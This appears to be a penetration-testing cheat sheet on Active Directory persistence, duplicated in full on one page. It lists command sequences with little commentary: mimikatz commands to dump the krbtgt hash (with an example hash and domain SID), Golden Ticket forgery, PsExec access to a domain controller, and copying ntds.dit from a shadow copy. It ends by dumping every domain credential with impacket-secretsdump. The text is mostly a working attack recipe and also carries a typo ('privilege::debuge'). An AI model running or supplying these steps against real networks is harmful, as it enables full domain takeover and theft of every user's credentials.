Persistence

Golden Tickets

C:\Tools\mimikatz.exe

privilege::debug

lsadump::lsa /patch

EXAMPLE:
Domain : CORP / S-1-5-21-1987370270-658905905-1781884369
RID : 000001f6 (502) User : krbtgt LM : NTLM : 1693c6cefafffc7af11ef34d1c788f47

C:\Tools\mimikatz.exe

privilege::debuge

kerberos::purge

kerberos::golden /user:<Username> /domain:<Domain Name> /sid:<Domain SID> /krbtgt:<krbtgt NTLM Hash> /ptt

misc::cmd

C:\Tools\SysinternalsSuite\PsExec.exe \\<Domain Controll Hostname> cmd

C:\Tools\vshadow.exe -nw -p C:

copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\windows\ntds\ntds.dit C:\ntds.dit.bak

reg.exe save hklm\system C:\system.bak

impacket-secretsdump -ntds ntds.dit.bak -system system.bak LOCAL

Last updated 22 days ago

C:\Tools\mimikatz.exe

privilege::debug

lsadump::lsa /patch

EXAMPLE:
Domain : CORP / S-1-5-21-1987370270-658905905-1781884369
RID : 000001f6 (502) User : krbtgt LM : NTLM : 1693c6cefafffc7af11ef34d1c788f47

C:\Tools\mimikatz.exe

privilege::debuge

kerberos::purge

kerberos::golden /user:<Username> /domain:<Domain Name> /sid:<Domain SID> /krbtgt:<krbtgt NTLM Hash> /ptt

misc::cmd

C:\Tools\SysinternalsSuite\PsExec.exe \\<Domain Controll Hostname> cmd

C:\Tools\vshadow.exe -nw -p C:

copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\windows\ntds\ntds.dit C:\ntds.dit.bak

reg.exe save hklm\system C:\system.bak

impacket-secretsdump -ntds ntds.dit.bak -system system.bak LOCAL

Last updated 22 days ago